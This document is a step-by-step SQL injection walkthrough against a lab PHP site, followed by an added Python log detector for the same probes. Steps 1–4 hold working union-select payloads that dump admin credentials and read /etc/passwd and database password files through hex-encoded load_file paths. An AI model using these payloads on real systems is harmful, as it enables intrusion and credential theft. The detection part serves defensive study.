1. First, determine whether an injection point exists
http://192.168.16.128/news.php?id=1
http://192.168.16.128/news.php?id=1' errors or the page renders abnormally
http://192.168.16.128/news.php?id=1 and 1=1 normal
http://192.168.16.128/news.php?id=1 and 1=2 errors or the page renders abnormally
If an error occurs, an injection point exists.
2. Determine the number of columns.
http://192.168.16.128/news.php?id=1 and 1=1 order by 8 normal
http://192.168.16.128/news.php?id=1 and 1=1 order by 10 error
This indicates 9 columns.
3. Guess the columns
http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9
The values 4, 7 and 9 appear in the page's article area, so SQL expressions are placed in columns 4, 7 and 9
http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9 from admin
For MySQL 5.0 and above, information_schema can be used to dump the database structure
http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()
Suppose an admin table exists
http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,group_concat(column_name),5,6,7,8,9 from information_schema.columns where table_name=0x61646D696E
http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,group_concat(username,0x40,password),5,6,7,8,9 from admin
4. Going further with load_file()
http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,load_file(0x633A5C626F6F742E696E69),5,6,7,8,9
load_file(0x633A5C626F6F742E696E69) c:\boot.ini
load_file(0x633A5C77696E646F77735C6D792E696E69) c:\windows\my.ini
load_file(0x633A5C77696E646F77735C7068702E696E69) c:\windows\php.ini
load_file(0x6D7973716C2F757365722E4D5944) mysql/user.MYD cross-table query of database passwords
load_file(0x2F6574632F706173737764) /etc/passwd
load_file(0x2F6574632F68747470642F636F6E662F68747470642E636F6E66) /etc/httpd/conf/httpd.conf
load_file(0x2F6574632F7068702E696E69) /etc/php.ini
load_file(0x2F6574632F706870352F617061636865322F7068702E696E69) /etc/php5/apache2/php.ini
load_file(0x2F6574632F6D792E696E69) /etc/my.ini
5. Use wwwscan to scan for the site's backend
Main goal: locate the admin backend, phpmyadmin and similar.
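From the defender's side, every probe in the walkthrough above leaves a distinctive trace in the web server access log. The following detector is an added example, not part of the original note; it assumes Apache/nginx combined log format and runs over constructed sample lines that mirror steps 1 to 4 (boolean probes, order by column counting, union select, information_schema enumeration, load_file with hex-encoded paths), decoding the hex literals so an analyst sees which file was targeted.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic) mirroring the probes above.
SAMPLE_LOG = """\
192.168.16.5 - - [10/Oct/2023:12:00:01 +0000] "GET /news.php?id=1 HTTP/1.1" 200 5120
192.168.16.5 - - [10/Oct/2023:12:00:02 +0000] "GET /news.php?id=1%27 HTTP/1.1" 500 312
192.168.16.5 - - [10/Oct/2023:12:00:03 +0000] "GET /news.php?id=1+and+1%3D1+order+by+10 HTTP/1.1" 500 312
192.168.16.5 - - [10/Oct/2023:12:00:04 +0000] "GET /news.php?id=1+and+1%3D2+union+select+1,2,3,group_concat(table_name),5,6,7,8,9+from+information_schema.tables+where+table_schema%3Ddatabase() HTTP/1.1" 200 5300
192.168.16.5 - - [10/Oct/2023:12:00:05 +0000] "GET /news.php?id=1+and+1%3D2+union+select+1,2,3,load_file(0x2F6574632F706173737764),5,6,7,8,9 HTTP/1.1" 200 6100
192.168.16.9 - - [10/Oct/2023:12:00:06 +0000] "GET /news.php?id=42 HTTP/1.1" 200 5120
"""

# Each rule is named after the step of the walkthrough it detects.
RULES = [
    ("boolean_probe", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("order_by_column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("file_read", re.compile(r"\bload_file\s*\(", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{6,}\b", re.I)),
]

# Combined log format: source IP, request line, status code.
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def decode_hex_literals(query: str) -> list[str]:
    """Decode 0x... literals so the analyst sees the file path the probe targeted."""
    out = []
    for h in re.findall(r"0x([0-9a-fA-F]+)", query):
        try:
            out.append(bytes.fromhex(h).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            pass  # odd-length or non-ASCII literal: not a readable path
    return out

def scan_log(text: str) -> list[dict]:
    """Return one finding per log line whose decoded query string matches a rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, path, status = m.groups()
        query = unquote_plus(path.split("?", 1)[1]) if "?" in path else ""
        hits = [name for name, rx in RULES if rx.search(query)]
        if hits:
            findings.append({"src": src, "status": int(status), "rules": hits,
                             "decoded": decode_hex_literals(query)})
    return findings
```

The bare quote probe from step 1 (id=1') matches no rule on its own; correlating a burst of 500 responses from one source with the later flagged requests is what catches that first step.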